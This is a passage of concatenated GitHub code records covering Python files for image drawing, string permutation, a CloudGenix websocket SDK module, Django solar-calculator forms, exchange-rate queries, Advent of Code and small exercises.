\")\r\n","repo_name":"MisterFoziljon/Neyron-tarmoq-autodiff-bilan","sub_path":"Qatlam.py","file_name":"Qatlam.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"9292136705","text":"import numpy as np\nfrom PIL import Image, ImageDraw\nimport typing\n\nfrom .helpers import image_to_numpy, numpy_to_image, get_line_boundingbox, calculate_polygon_coords\nfrom .definitions import ElementType\n\ndef draw_polygon(image: np.ndarray, params:tuple, polygon_count:int) -> tuple:\n height, width, _ = image.shape\n\n color = params[4]\n overlay = Image.new(\"RGBA\", (width, height), color[:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n\n coords = calculate_polygon_coords(params[0], params[1], params[2], params[3], polygon_count)\n\n x_coords = []\n y_coords = []\n for idx in range(polygon_count * 2):\n if idx % 2 == 0:\n x_coords.append(coords[idx])\n else:\n y_coords.append(coords[idx])\n\n draw.polygon([(xc, yc) for xc, yc in zip(x_coords, y_coords)], fill=color)\n bbox = np.array([max(0, min(x_coords) - 1), max(0, min(y_coords) - 1), min(width, max(x_coords) + 1), min(height, max(y_coords) + 1)], dtype=int)\n return overlay, bbox\n\ndef draw_element(output_image:np.ndarray, params:tuple, element_type:ElementType) -> typing.Tuple[np.ndarray, np.ndarray]:\n height, width, _ = output_image.shape\n\n img = numpy_to_image(output_image)\n\n if element_type == ElementType.LINE:\n overlay = Image.new(\"RGBA\", img.size, params[5][:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n end_point = (params[0] + np.cos(params[4]) * params[2], params[1] + np.sin(params[4]) * params[2])\n coords = [params[0], params[1], *end_point]\n draw.line(coords, params[5], params[3])\n bbox = get_line_boundingbox(np.array(coords, dtype=np.float64), params[3], width, height).astype(int)\n elif element_type == ElementType.CIRCLE:\n thickness = (params[2] - 1) / 2\n color = params[3]\n ellipse_params = (params[0] - thickness, params[1] - thickness, params[0] + thickness, params[1] + thickness)\n\n overlay = Image.new(\"RGBA\", img.size, color[:3] + (0,))\n draw = ImageDraw.Draw(overlay)\n\n draw.ellipse(ellipse_params, fill=color)\n bbox = np.array([max(0, ellipse_params[0] - 1), max(0, ellipse_params[1] - 1), min(width, ellipse_params[2] + 1), min(height, ellipse_params[3] + 1)], dtype=int)\n elif element_type == ElementType.TRIANGLE:\n overlay, bbox = draw_polygon(output_image, params, 3)\n elif element_type == ElementType.SQUARE:\n overlay, bbox = draw_polygon(output_image, params, 4)\n elif element_type == ElementType.PENTAGON:\n overlay, bbox = draw_polygon(output_image, params, 5)\n elif element_type == ElementType.HEXAGON:\n overlay, bbox = draw_polygon(output_image, params, 6)\n elif element_type == ElementType.OCTAGON:\n overlay, bbox = draw_polygon(output_image, params, 8)\n else:\n raise Exception(\"Invalid element type for draw\")\n\n img.alpha_composite(overlay)\n\n return image_to_numpy(img), bbox\n","repo_name":"Matesxs/elementarise","sub_path":"elementarise/drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6470453215","text":"# small string = s\n# bing string = b\n# find permuations of s inside b.\n\n\ndef toString(List):\n return ''.join(List)\n\n\ndef permute(listofstring, start, end):\n\n\n\n\n if start==end:\n\n\n print (toString(listofstring))\n\n print (\"______________________\")\n\n else:\n\n\n #print (\"start: \" + str(start))\n\n for i in range(start,end+1):\n\n # print (\"start\")\n #print(listofstring)\n\n print (\"i:\" + str(i) + \" \" + \"start: \" + str(start) + \" \" + \"end: \" + str(end))\n\n temp = listofstring[start] # first char\n listofstring[start] = listofstring[i] \n #print (listofstring[start])\n listofstring[i] = temp\n # print (listofstring[i])\n \n\n\n #print (\"after\")\n # print(listofstring)\n\n #a[l], a[i] = a[i], a[l]\n\n permute(listofstring, start+1, end)\n\n print(\"Out\")\n\n print (\"i:\" + str(i) + \" \" + \"start: \" + str(start) + \" \" + \"end: \" + str(end))\n\n #print(\"Start: \" + str(start))\n\n temp = listofstring[start]\n listofstring[start] = listofstring[i]\n listofstring[i] = temp\n\n #print (\"temp: \" + str(temp))\n\n\n #a[l], a[i] = a[i], a[l] # backtrack\n\ndef findString(s, b):\n\n lists = list(s)\n listb = list(b)\n\n print (lists)\n print (listb)\n\n for letterb in b:\n\n for lettera in s:\n\n pass\n\n\n\ndef main(a, l, r):\n\n permute(a, l, r)\n\n\n #findString(s, b)\n\n\nif __name__ == '__main__':\n\n string = \"abc\"\n listofstring = list(string)\n end = len(string)\n \n permute(listofstring, 0, end-1)","repo_name":"WilliamMarti/CCI","sub_path":"strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"34881934629","text":"import logging\n\n__author__ = \"CloudGenix Developer Support \"\n__email__ = \"developers@cloudgenix.com\"\n__copyright__ = \"Copyright (c) 2017-2023, 2019 CloudGenix, Inc\"\n__license__ = \"\"\"\n MIT License\n\n Copyright (c) 2017-2023 CloudGenix, Inc\n\n Permission is hereby granted, free of charge, to any person obtaining a copy\n of this software and associated documentation files (the \"Software\"), to deal\n in the Software without restriction, including without limitation the rights\n to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n copies of the Software, and to permit persons to whom the Software is\n furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all\n copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n SOFTWARE.\n\"\"\"\n\n# Set logging to function name\napi_logger = logging.getLogger(__name__)\n\"\"\"`logging.getlogger` object to enable debug printing via `cloudgenix.API.set_debug`\"\"\"\n\n\nclass WebSockets(object):\n \"\"\"\n CloudGenix Python SDK - WebSocket Functions\n\n Object to handle WebSocket operations.\n \"\"\"\n\n # placeholder for parent class namespace\n _parent_class = None\n\n def toolkit_session(self, element_id, tenant_id=None, api_version=\"v2.0\", cols=207, rows=53, **kwargs):\n \"\"\"\n Open a Toolkit Session WebSocket\n\n **Parameters:**:\n\n - **element_id**: Element ID\n - **tenant_id**: Tenant ID\n - **api_version**: API version to use (default v2.0)\n - **cols**: Optional: Integer, Number of columns for terminal (default 207)\n - **rows**: Optional: Integer, Number of rows for terminal (default 53)\n - ****kwargs**: Optional: Additional Keyword Arguments to pass to `websockets.client.Connect()`\n\n **Returns:** `websockets.client.Connect` object.\n \"\"\"\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n # set controller, converting protocol to wss\n wss_ctlr = self._parent_class.controller.replace('https://', 'wss://', 1)\n\n url = str(wss_ctlr) + \"/{}/api/tenants/{}/elements/{}/ws/toolkitsessions?cols={}&rows={}\" \\\n \"\".format(api_version, tenant_id, element_id, cols, rows)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.websocket_call(url, **kwargs)\n\n def default(self, tenant_id=None, api_version=\"v2.0\", **kwargs):\n \"\"\"\n Open the default Tenant WebSocket for use in multiple functions.\n\n **Parameters:**:\n\n - **tenant_id**: Tenant ID\n - **api_version**: API version to use (default v2.0)\n - ****kwargs**: Optional: Additional Keyword Arguments to pass to `websockets.client.Connect()`\n\n **Returns:** `websockets.client.Connect` object.\n \"\"\"\n\n if tenant_id is None and self._parent_class.tenant_id:\n # Pull tenant_id from parent namespace cache.\n tenant_id = self._parent_class.tenant_id\n elif not tenant_id:\n # No value for tenant_id.\n raise TypeError(\"tenant_id is required but not set or cached.\")\n # set controller, converting protocol to wss\n wss_ctlr = self._parent_class.controller.replace('https://', 'wss://', 1)\n\n url = str(wss_ctlr) + \"/{}/api/tenants/{}/ws\" \\\n \"\".format(api_version, tenant_id)\n\n api_logger.debug(\"URL = %s\", url)\n return self._parent_class.websocket_call(url, **kwargs)\n","repo_name":"CloudGenix/sdk-python","sub_path":"cloudgenix/ws_api.py","file_name":"ws_api.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"91"} +{"seq_id":"36103237503","text":"from django import forms\nfrom equipamentos.models import Irradiacao, Modulo_fotovoltaico,Inversor_fotovoltaico\nfrom temperatura.models import Temperatura\nfrom django.shortcuts import get_object_or_404\n\nclass CalculadoraForm(forms.Form):\n\n CDD = (\n (30, 'Monofásico'),\n (50, 'Bifásico'),\n (100, 'Trifásico')\n )\n\n # custo_de_disponibilidade = forms.IntegerField(label='Custo de disponibilidade')\n custo_de_disponibilidade = forms.ChoiceField(label='Custo de disponibilidade', choices=CDD)\n consumo_medio = forms.DecimalField(label='Consumo médio', decimal_places=2)\n irradiacao = forms.ModelChoiceField(queryset=Irradiacao.objects.all(), initial='0')\n modulo = forms.ModelChoiceField(queryset=Modulo_fotovoltaico.objects.all(), initial='0')\n #inversor = forms.ModelChoiceField(queryset=Inversor_fotovoltaico.objects.all(), initial='0')\n\nclass CalculadoraCompletaForm(forms.Form):\n CDD = (\n (30, 'Monofásico'),\n (50, 'Bifásico'),\n (100, 'Trifásico')\n )\n\n TEMP = (\n (22, 'Estrutura totalmente elevada (solo)'),\n (28, 'Laje ou telhado (com espaço/inclinação)'),\n (29, 'Sobre o telhado (com ventilação)'),\n (32, 'integrado (sem ventilação)')\n )\n\n custo_de_disponibilidade = forms.ChoiceField(label='Custo de disponibilidade', choices=CDD, initial='0')\n consumo_medio = forms.FloatField(label='Consumo médio')\n irradiacao = forms.ModelChoiceField(queryset=Irradiacao.objects.all(), initial='0')\n modulo = forms.ModelChoiceField(queryset=Modulo_fotovoltaico.objects.all(), initial='0')\n inversor = forms.ModelChoiceField(queryset=Inversor_fotovoltaico.objects.all(), initial='0')\n temperatura_ambiente = forms.ChoiceField(label='Temperatura no local de instalação', choices=TEMP)\n temperatura_media = forms.ModelChoiceField(queryset=Temperatura.objects.all(), initial='0')\n perda_sombreamento = forms.FloatField(label='Perdas por sombreamento', initial=2)\n perda_sujeira = forms.FloatField(label='Perdas por sujeira', initial=0)\n perda_tolerancia_potencia = forms.FloatField(label='Perdas por Tolerância de potência', initial=0)\n perda_mismatching = forms.FloatField(label='Perdas por mismatching', initial=1)\n perda_cabeamento_cc = forms.FloatField(label='Perdas por cabeamento CC', initial=1)\n perda_spmp = forms.FloatField(label='Perdas por MPPT', initial=0)\n perda_conversao_ccca = forms.FloatField(label='Perdas por conversão CC CA', initial=2.40)\n perda_cabeamento_ca = forms.FloatField(label='Perdas por cabeamento CA', initial=1)\n tarifa_energia = forms.FloatField(label='Tarifa de energia elétrica', initial='0.92')\n \n\n\n ","repo_name":"matheusbaars/gerenciamento-solar","sub_path":"calculadora/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"16718274362","text":"import argparse\n\nfrom pathlib import Path\nfrom PIL import Image\nfrom resizeimage import resizeimage\n\nDATASETS = {\n \"montgomery\": \"Montgomery/MontgomerySet/CXR_png/\",\n \"china\": \"ChinaSet_AllFiles/ChinaSet_AllFiles/CXR_png/\",\n}\nFINAL_IMAGE_SIZE = [512, 512]\n\n\ndef process_dataset(input_path, output_path):\n if not output_path.exists():\n output_path.mkdir(parents=True)\n\n for image in input_path.glob(\"*.png\"):\n with image.open(\"rb\") as fd_img:\n img = Image.open(fd_img)\n img = resizeimage.resize_cover(img, FINAL_IMAGE_SIZE)\n img.save(output_path.joinpath(image.name), img.format)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Crops and resizes images\")\n parser.add_argument(\n \"-d\",\n \"--dataset-dir\",\n dest=\"dataset_dir\",\n required=True,\n help=\"Path to the kaggle dataset directory\",\n )\n parser.add_argument(\n \"-o\",\n \"--output-dir\",\n dest=\"output_dir\",\n help=\"Destination for the cropped images\",\n default=\"output\",\n )\n args = parser.parse_args()\n\n dataset_path = Path(args.dataset_dir)\n output_path = Path(args.output_dir)\n\n for dataset in DATASETS:\n process_dataset(dataset_path / DATASETS[dataset], output_path / dataset)\n","repo_name":"dbanck/tb-image-prep","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"} +{"seq_id":"6798404407","text":"# Name : Rupanshoo Saxena\n# Roll No : 2019096\n# Group : 6 (SECTION A)\n\nimport urllib.request #for Task 1.1\nimport datetime #for Task 4\n\n\ndef getLatestRates(): #Task 1.1: uses the above imported library to get latest json string\n\t\"\"\" Returns: a JSON string that is a response to a latest rates query.\n\n\tThe Json string will have the attributes: rates, base and date (yyyy-mm-dd).\n\t\"\"\"\n\turl = urllib.request.urlopen(\"http://api.exchangeratesapi.io/latest\")\n\tdata = url.read() #reads json string\n\treturn data\n\n\n\ndef getSpecificRates(date): #additional function made to get json string of the specified date\n\turlSpec = urllib.request.urlopen(\"http://api.exchangeratesapi.io/\" + str(date))\n\tdataSpec = str(urlSpec.read()) #reads json string and stores it in the form of normal string\n\treturn dataSpec #returns normal string\n\n\n\n\ndef getRangeOfRates(sDate,eDate): #additional function made to get json strings between given time period(includes data of start name and doesnot take data of end date)\n\turl3 = urllib.request.urlopen(\"https://api.exchangeratesapi.io/history?start_at=\"+str(sDate)+\"&end_at=\"+str(eDate))\n\tdata3 = str(url3.read())\n\treturn data3 #returns string\n\n\n\ndef changeBase(amount, currency, desiredCurrency, date): #Task 1\n\t\"\"\" Outputs: a float value f.\n\t\"\"\"\n\n\tt1 = getSpecificRates(date) #stores json string of that specific date in the form of a normal string\n\tcur1 = t1.find(currency) #stores index of current currency from the string\n\tcur2 = t1.find(desiredCurrency) #stores index of desired currency from the string\n\n\tif(cur1 == -1 or cur2 == -1): #when either of the currencies entered is not present in the string - show error\n\t\treturn \"Wrong currency entered\"\n\telse:\n\n\n\t\tif currency == \"EUR\": #when currency is Euro\n\t\t\tif desiredCurrency == \"EUR\": #when desired currency is also Euro\n\t\t\t\treturn amount\n\n\t\t\ttemp4 = t1[cur2:] #slices string from the index of the desired currency till the end\n\t\t\ttemp5 = temp4.find(\",\")\n\t\t\ttemp6 = temp4.find(\":\")\n\t\t\tcur2Val = float(temp4[temp6+1:temp5]) #slices string such that it stores the value of the desired currency which is present between the : and ,\n\t\t\treturn amount * cur2Val\n\n\t\ttemp1 = t1[cur1:] #slices string from the index of the current currency till the end\n\t\ttemp2 = temp1.find(\",\")\n\t\ttemp3 = temp1.find(\":\")\n\t\tcur1Val = float(temp1[temp3+1:temp2]) #slices string such that it stores the value of the current currency which is present between the : and ,\n\t\t \n\t\tif desiredCurrency == \"EUR\": #when desired currency is EURO\n\t\t\treturn amount / cur1Val\n\n\t\ttemp4 = t1[cur2:] #slices string from the index of the desired currency till the end\n\t\ttemp5 = temp4.find(\",\")\n\t\ttemp6 = temp4.find(\":\")\n\t\tcur2Val = float(temp4[temp6+1:temp5]) #slices string such that it stores the value of the desired currency which is present between the : and ,\n\t\t#print(cur2Val)\n\treturn ((float(cur2Val)/float(cur1Val))*float(amount)) #logic for converting given value from current to desired currency\n\n#print(changeBase(250,\"EUR\",\"CNY\",\"2017-06-25\"))\n#json = getLatestRates()\n\ndef valuesList(t2): #additional function to put all the values of the currency in order of occurence in the json string in a list\n \tt2 = str(t2) #json string converted to str\n \tasc = [] #empty list created \n \ttemp7 = t2.find(\":\") \n \ttemp8 = t2.find(\"}\")\n \tt2 = t2[temp7+1:temp8+1] #slices string such that the initial part before : and end part after } is removed\n \ttemp12 = t2.find(\"MYR\") \n \tfor i in range(len(t2[0:temp12])): \n \t\ttemp9 = t2.find(\":\")\n \t\ttemp10 = t2.find(\",\")\n \t\tasc.append(float(t2[temp9 + 1:temp10]))\n \t\tt2 = t2[temp10+1:]\n \t\tif(i==31):\n \t\t\tbreak\n\n \t\t\n \t\n \treturn asc\n\nb = getLatestRates() \nc = valuesList(b)\n\n\n\n\ndef printAscending(json): #Task 2\n\t\"\"\" Output: the sorted order of the Rates \n\t\tYou don't have to return anything.\n\t\n\tParameter:\n\tjson: a json string to parse\n\t\"\"\"\n\tjson = valuesList(json)\n\tascTemp = []\n\tfor i in range(len(json)): #finds the min value in the unsorted list, appends that value in a temporary list and removes it from the original list\n\t\ttemp11 = min(json) \n\t\tascTemp.append(temp11)\n\t\tjson.remove(temp11)\n\tjson = ascTemp #temporary list is stored back into the original list\n\t#print(json)\n\n\n\tfor i in range(len(json)): #loop for getting output in given form with display of the names of currencies\n\t\tasc2 = str(getLatestRates())\n\t\ttemp13 = asc2.find(str(json[i])) \n\t\ttemp14 = asc2[temp13 - 3:temp13 - 6:-1]\n\t\tprint(\"1 Euro = \" + str(json[i]) + ' ' + temp14[::-1])\n\t\tasc2 = asc2[:temp13 - 2] + asc2[temp13:]\n\t\t\n\n\n#printAscending(b)\n\n\n\ndef extremeFridays(startDate, endDate, currency): #Task 3 : ASSUMPTION- end date's data will also be included\n\t\"\"\" Output: on which friday was currency the strongest and on which was it the weakest.\n\t\tYou don't have to return anything.\n\t\t\n\tParameters: \n\tstardDate and endDate: strings of the form yyyy-mm-dd\n\tcurrency: a string representing the currency those extremes you have to determine\n\t\"\"\"\n\tt3 = getRangeOfRates(startDate,endDate)\n\ttdelta1 = datetime.timedelta(days=1) #timedelta prints date of the day according to the count given in the brackets i.e. if days = 7 then it will give date of the day after 7 days\n\ttdelta2 = datetime.timedelta(days=7) #count of days = 7\n\tfriday=[] #list to store all dates which occur on a friday in the given range\n\tdate1 = datetime.datetime.strptime(startDate,'%Y-%m-%d').date() #to convert the date from str to datetime\n\tdate2 = datetime.datetime.strptime(endDate,'%Y-%m-%d').date()\n\twhile(date1.weekday()!=4):\n\t\tdate1 = date1 + tdelta1 #for finding the first friday\n\tfriday.append(str(date1))\n\n\twhile(date1 < date2): #adding 7 to get next friday\n\t\tdate1 = date1 + tdelta2\n\t\tfriday.append(str(date1)) \n\n\tif(date2.weekday()!=4): #condition for when the end date is not a friday\n\t\tdel friday[-1]\n\t#print(friday)\n\n\t\n\n\tDict = {} #for making a dictionary by the name Dict\n\n\tfor i in range(len(friday)): #for storing the values of the given currency in the dictionary with the dates as keys\n\t\ttemp15 = t3.find(friday[i])\n\t\ttemp16 = t3[temp15:]\n\t\ttemp17 = temp16[:temp16.find('}')]\n\t\ttemp18 = temp17[temp17.find(currency):]\n\t\ttemp19 = temp18[5:temp18.find(',')]\n\t\tif (temp19 == ''):\n\t\t\tcontinue\n\t\tDict[friday[i]] = temp19 \n\t\n\t#print(Dict)\n\tmax_value = max(Dict.values()) #gives max value of currency\n\tmin_value = min(Dict.values()) #gives minimum value of currency\n\t\n\tprint(currency + \" was weakest on \" + max(Dict, key=Dict.get) + \". 1 Euro was equal to \" + max_value + \" \" + currency) #higher the value of the currency, weaker the currency\n\tprint(currency + \" was strongest on \" + min(Dict, key=lambda k:Dict[k]) + \". 1 Euro was equal to \" + min_value + \" \" + currency) #lesser the value of the currency, stronger the currency\n\n\n#extremeFridays(\"2019-02-16\",\"2019-06-28\",\"CAD\")\n\n\n\n\ndef findMissingDates(startDate, endDate): #Task 4\n\t\"\"\" Output: the dates that are not present when you do a json query from startDate to endDate\n\t\tYou don't have to return anything.\n\n\t\tParameters: stardDate and endDate: strings of the form yyyy-mm-dd\n\t\"\"\"\n\tt4 = getRangeOfRates(startDate,endDate)\n\tallDates = [] #list to store all the dates from start date to end date\n\tdate3 = datetime.datetime.strptime(startDate,'%Y-%m-%d').date() \n\tdate4 = datetime.datetime.strptime(endDate,'%Y-%m-%d').date() \n\ttdelta = datetime.timedelta(days=1)\n\t\n\twhile(date3 <= date4): #including end Date too\n\t\tallDates.append(str(date3))\n\t\tdate3 = date3 + tdelta\n\t\n\n\tmissing = [] #list to store all the missing dates\n\n\tfor i in range(len(allDates)):\n\t\ttemp19 = t4.find(allDates[i])\n\n\t\tif(temp19 == -1): #if the date was not there in the json module\n\t\t\tmissing.append(allDates[i])\n\t\n\t\n\tprint(\"The following dates were not present:\\n\")\n\tfor i in range(len(missing)):\n\t\tprint(missing[i]+'\\n')\n\n#findMissingDates(\"2018-01-01\",\"2018-09-01\")\n","repo_name":"rupanshoo/access-data-currency-exchange-rates","sub_path":"a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":7823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"38682667747","text":"# Desenvolva um programa que leia o nome, idade e sexode 4 pessoas. No final do programa mostre:\n#A média de idade do grupo / Qual o nome do homem mais velho / Quantas mulheres tem menos de 20 anos.\n\nsomaidade = 0\ntotalidade = 0\nmaioridadehomem = 0\nnomevelho = ''\nmulheres20 = 0\nfor pessoa in range(1,5):\n print('------{} Pessoa ------'.format(pessoa))\n nome = str(input('Nome: '))\n idade = int(input('Idade: '))\n sexo = str(input('[M/F]: '))\n\n somaidade = somaidade + idade\n if pessoa == 1 and sexo == 'M':\n maioridadehomem = idade\n nomevelho = nome\n if idade > maioridadehomem and sexo == 'M':\n maioridadehomem = idade\n nomevelho = nome\n\n if sexo =='F' and idade < 20:\n mulheres20 = mulheres20 +1\n\n\n\nmedia = somaidade / 4\nprint('A media de idade de todas as pessoas é: {}'.format(media))\nprint('O homem mais velho tem {} anos e seu nome é: {}'.format(maioridadehomem, nomevelho))\nprint('{} Total de mulhers menor de 20 anos'.format(mulheres20))","repo_name":"jeffersonsena7/PYTHON","sub_path":"CursoPython/Exercicio56.py","file_name":"Exercicio56.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40188408773","text":"#!/usr/bin/env python3\n\n### Advent of Code - 2015 - Day 22\n\nimport sys, requests, re, math, itertools, functools, os, collections\nfrom functools import lru_cache\n\nsys.path.append('../../python/')\nfrom aoc_utils import *\n\n# read input data file as one long string and as an array of lines\ninputfile = 'input' if len(sys.argv) < 2 else sys.argv[1]\nif not os.path.exists(inputfile):\n print(RED+f\"Input file {inputfile} not found!\"+CLEAR)\n quit()\nfinput = open(inputfile,'r').read().rstrip()\ninput_lines = [line.strip() for line in finput.split('\\n')]\nprint(DBLUE+f\"Input <{inputfile}>, num lines: {len(input_lines)}\"+CLEAR)\n\nspells = dict()\nspells['Magic Missle'] = { 'cost':53, 'dmg':4, 'hp':0, 'armor':0, 'turns':0, 'mana':0 }\nspells['Drain'] = { 'cost':73, 'dmg':2, 'hp':2, 'armor':0, 'turns':0, 'mana':0 }\nspells['Shield'] = { 'cost':113, 'dmg':0, 'hp':0, 'armor':7, 'turns':6, 'mana':0 }\nspells['Poison'] = { 'cost':173, 'dmg':3, 'hp':0, 'armor':0, 'turns':6, 'mana':0 }\nspells[\"Recharge\"] = { 'cost':229, 'dmg':0, 'hp':0, 'armor':0, 'turns':5, 'mana':101 }\n\ndef take_turn(players_turn, boss_hp, player_hp, player_mana, active_spells, mana_used):\n if players_turn and p2:\n player_hp -= 1\n if player_hp <= 0:\n return\n\n player_armor = 0 \n new_spells = dict()\n for n,d in active_spells.items():\n if d['turns'] >= 0: # perform the spell this turn\n boss_hp -= d['dmg']\n player_hp += d['hp']\n player_armor += d['armor']\n player_mana += d['mana']\n new_sp = d.copy()\n new_sp['turns'] -= 1\n if new_sp['turns'] > 0:\n new_spells[n] = new_sp\n\n if boss_hp <= 0: # we win!\n global least_mana_used\n least_mana_used = min(mana_used, least_mana_used)\n return\n\n if mana_used >= least_mana_used:\n return\n\n if players_turn:\n for n,d in spells.items():\n if n in new_spells.keys(): # can't cast an already active spell\n continue\n if d['cost'] <= player_mana:\n nsp_copy = new_spells.copy()\n nsp_copy[n] = d.copy()\n take_turn(False, boss_hp, player_hp, player_mana-d['cost'], nsp_copy, mana_used+d['cost'])\n else:\n player_hp += player_armor-boss_dmg if player_armor-boss_dmg < 0 else -1\n if player_hp > 0:\n take_turn(True, boss_hp, player_hp, player_mana, new_spells, mana_used)\n return\n\n# Setup\nplayer_hp = 50\nplayer_mana = 500\nboss_hp = int(input_lines[0].split()[-1])\nboss_dmg = int(input_lines[1].split()[-1])\n\np2 = False\nleast_mana_used = 9999999\ntake_turn(True, boss_hp, player_hp, player_mana, dict(), 0)\npart1(least_mana_used)\n\np2 = True\nleast_mana_used = 9999999\ntake_turn(True, boss_hp, player_hp, player_mana, dict(), 0)\npart2(least_mana_used)\n","repo_name":"rdefeo/adventofcode","sub_path":"2015/day22/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"17931773859","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 21 22:53:14 2020\n\n@author: liang\n\"\"\"\n\nS = input()\n\nans = S[0]\n\nfor i in range(8):\n tmp = int(S[0])\n lis = list()\n for j in range(3):\n lis.append(i>>j&1)\n for i in range(3):\n if lis[i] == 1:\n tmp += int(S[i+1])\n else:\n tmp -= int(S[i+1])\n #print(tmp)\n if tmp == 7:\n for i in range(3):\n if lis[i] == 1:\n ans += \"+\" + S[i+1]\n else:\n ans += \"-\" + S[i+1]\n ans += \"=7\"\n break\n #print(lis)\nelse:\n print(\"err\")\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03545/s999645533.py","file_name":"s999645533.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"26062594758","text":"\ndef check_palindrome():\n \"\"\"\n Runs through all 6-digit numbers and checks the mentioned conditions.\n The function prints out the numbers that satisfy this condition.\n\n Note: It should print out the first number (with a palindrome in its last 4 digits),\n not all 4 \"versions\" of it.\n \"\"\"\n\n #number_to_check=counter;\n for i in range(100000, 1000000):\n #print(str(i)[2:6])\n if(check_string_palindrome(str(i)[2:6])==True ):#convert int to sting// the last 4 digits are palindrom\n #print(str(i)[2:6])\n temp = i + 1 #first addition of one -> palindrom in last 5 digits\n if(check_string_palindrome(str(temp)[1:6])==True):\n #print(str(i)[1:6])\n temp = i + 2 # second addition of one -> palindrom in middle 4 digits\n if (check_string_palindrome(str(temp)[1:5]) == True):\n #print(str(i)[1:5])\n temp = i + 3 # third addition of one all digits palindrom\n if (check_string_palindrome(str(temp)[0:6]) == True):\n print(i)\n\n\ndef check_string_palindrome(String_Check_poly): #internal function to chack if palindrom\n for i in range(len(String_Check_poly)//2):\n if String_Check_poly[i] != String_Check_poly[-1-i]:\n return False\n #print(String_Check_poly)\n return True\n\n\n\n\n\ncheck_palindrome()\n\n","repo_name":"nisimperets/assignment-1-complete","sub_path":"ex1 q2.py","file_name":"ex1 q2.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"43582976324","text":"from collections import UserDict\r\n\r\nclass Field:\r\n # Field: Базовий клас для полів запису. Буде батьківським для всіх полів, у ньому реалізується логіка загальна для всіх полів\r\n def __init__(self, value):\r\n self.value = value\r\n\r\n def __str__(self):\r\n return str(self.value)\r\n\r\n\r\nclass Name(Field):\r\n # Name: Клас для зберігання імені контакту. Обов'язкове поле.\r\n ...\r\n\r\n\r\nclass Phone(Field):\r\n # Необов'язкове поле з телефоном та таких один запис Record може містити декілька.\r\n # Клас Phone:\r\n # Реалізовано валідацію номера телефону (має бути 10 цифр).\r\n # Реалізовано всі класи із завдання\r\n def __init__(self, value) -> None:\r\n if len(value) == 10 and value.isdigit():\r\n self.value = value\r\n else:\r\n raise ValueError\r\n\r\n\r\nclass Record:\r\n # Record: Клас для зберігання інформації про контакт, включаючи ім'я та список телефонів.\r\n # Відповідає за логіку додавання/видалення/редагування необов'язкових полів та зберігання обов'язкового поля Name\r\n # Record:\r\n # Додавання телефонів.\r\n # Видалення телефонів.\r\n # Редагування телефонів.\r\n # Пошук телефону.\r\n # Критерії приймання\r\n # Клас Record:\r\n # Реалізовано зберігання об'єкта Name в окремому атрибуті.\r\n # Реалізовано зберігання списку об'єктів Phone в окремому атрибуті.\r\n # Реалізовано методи для додавання - add_phone/видалення - remove_phone/редагування - edit_phone/пошуку об'єктів Phone - find_phone.\r\n\r\n # 1. Метод find_phone класу Record не знайшов перший номер контакту!\r\n # 2. Метод find_phone класу Record не знайшов другий номер контакту!\r\n # 3. Провалена перевірка. Якщо номеру телефона не існує то метод find_phone класу Record повинен повернути None!\r\n # 4. Метод edit_phone класу Record не відреагував номер телефону, що існує!\r\n # 5. Провалена перевірка. Якщо номеру телефону не існує то метод edit_phone класу Record повинен викинути виключення ValueError!\r\n # 6. Провалена перевірка. Метод remove_phone класу Record не видаляє номер телефону!\r\n\r\n def __init__(self, name):\r\n self.name = Name(name)\r\n self.phones = []\r\n\r\n def __str__(self):\r\n return f\"Contact name: {self.name.value}, phones: {'; '.join(p.value for p in self.phones)}\"\r\n\r\n def add_phone(self, value: Field):\r\n self.phones.append(value)\r\n\r\n def remove_phone(self, 